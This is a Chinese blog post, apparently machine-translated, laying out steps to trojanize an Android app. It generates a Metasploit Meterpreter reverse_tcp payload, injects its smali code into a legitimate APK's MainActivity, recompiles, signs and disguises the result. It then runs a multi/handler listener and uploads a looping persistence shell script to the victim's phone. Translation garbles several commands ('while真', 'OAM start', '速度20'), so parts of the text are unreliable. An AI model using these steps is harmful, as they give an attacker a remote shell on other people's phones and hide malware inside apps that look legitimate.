首页 > 编程知识 正文

android信息注入,androidsql防注入

时间:2023-05-03 20:44:33 阅读:151181 作者:3978

参考了网上很多大神的文章,做了简单的总结,请作为参考

1、MSF venom-p Android/meter preter/reverse _ tcpl host=本机IP LPORT=监听端口号-o virus.apk

2、apktook反编译virus.apk和normal.apk

3、在normal.apk门户网站normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键字,

4、找到com/xxx/xxx/MainActivety.smail文件搜索onCreat函数,找到bundle对象,然后单击payload: invoke-static {p0},lcom ) v

5 .将virus.apk中的smail文件(payload中的smail/com/metasploit文件)复制到normal.apk中的smail/com/目录中

6、androidManifest.xml添加权限permission

7、编译回//https://blog.csdn.net/weixin _ 44212888/article/details/111396635

8、签署//https://blog.csdn.net/weixin _ 44212888/article/details/111396635

9、装壶//百度“装壶道具”

10、service postgresql start //启动数据库

11、启动MSF控制台//MSF

12、use exploit/multi/handler //路攻击模块

13、setpayloadandroid/meter preter/reverse _ TCP//选择要使用的payload

14、show options //查看应设置的参数

15、exploit //执行

16 )继续拦截sh脚本的编写,保存桌面并赋予权限

#! /bin/bash

while真

OAM start-- user0--a Android.intent.action.main (action标记)-ncom.metasploit.stage/. main activity

速度20

meterpreter pwd //查找当前路径

meterpreter upload /root/桌面/chixu.sh //上传脚本

输入meter preter shell//shell

pwd

/

找到CD/data/user/0/com.Baidu.flashlight/files//脚本所在的文件夹

洛杉矶地铁

chixu.sh

运行sh chixu.sh //脚本

msf支持在线自动执行命令。 设置InitialAutoRunScript或autorunscript后,联机会话将自动上载和运行脚本

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。